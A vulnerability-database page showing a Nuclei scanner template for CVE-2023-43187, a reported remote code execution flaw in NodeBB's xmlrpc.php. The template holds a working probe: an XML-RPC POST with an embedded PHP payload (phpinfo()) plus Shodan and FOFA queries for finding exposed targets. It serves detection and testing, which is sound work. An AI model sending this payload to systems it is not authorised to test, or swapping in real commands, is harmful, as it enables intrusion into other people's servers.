Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2023-43187
HistoryMar 06, 2024 - 6:03 p.m.

NodeBB XML-RPC Request xmlrpc.php - XML Injection

2024-03-0618:03:53
ProjectDiscovery
github.com
21
cve
nodebb
rce
xml injection
remote code execution
cvss:3.1
cwe-91

0.237 Low

EPSS

Percentile

96.6%

JSON
A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.

id: CVE-2023-43187

info:
  name: NodeBB XML-RPC Request xmlrpc.php - XML Injection
  author: 0xParth
  severity: critical
  description: |
    A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.
  reference:
    - https://github.com/jagat-singh-chaudhary/CVE/blob/main/CVE-2023-43187
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43187
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43187
    cwe-id: CWE-91
    epss-score: 0.2535
    epss-percentile: 0.96685
    cpe: cpe:2.3:a:nodebb:nodebb:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: nodebb
    product: nodebb
    shodan-query: cpe:"cpe:2.3:a:nodebb:nodebb"
    fofa-query: "title=\"nodebb\""
  tags: cve,cve2023,nodebb,rce
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        internal: true
        dsl:
          - contains(to_lower(body), "nodebb")

  - method: POST
    path:
      - "{{BaseURL}}/xmlrpc.php"

    headers:
      Content-Type: "text/xml"

    body: |
      <?xml version="1.0"?>
      <methodCall>
        <methodName>system.listMethods</methodName>
        <params>
          <param>
            <value><?php phpinfo(); ?></value>
          </param>
        </params>
      </methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>phpinfo()</title>"
          - "PHP Version"
        condition: or

      - type: status
        status:
          - 200
# digest: 490a0046304402206f73e8bfe9f915a5f04e492f88298ddf9c08f2c4fba07b868c0fefcc55b5585e02205b4976d241ea3d57d596f3af37f9478a17a66b28bf536fe9d09ab098811bbb99:922c64590222798bb761d5b6d8e72950

Related

osv 1
cvelist 1
cve 1
prion 1
osv
osv
CVE-2023-43187
2023-09-27 15:19:33
cvelist
cvelist
CVE-2023-43187
2023-09-26 00:00:00
cve
cve
CVE-2023-43187
2023-09-27 15:19:33
prion
prion
Remote code execution
2023-09-27 15:19:00

0.237 Low

EPSS

Percentile

96.6%

JSON
Related for NUCLEI:CVE-2023-43187
osv1cvelist1cve1prion1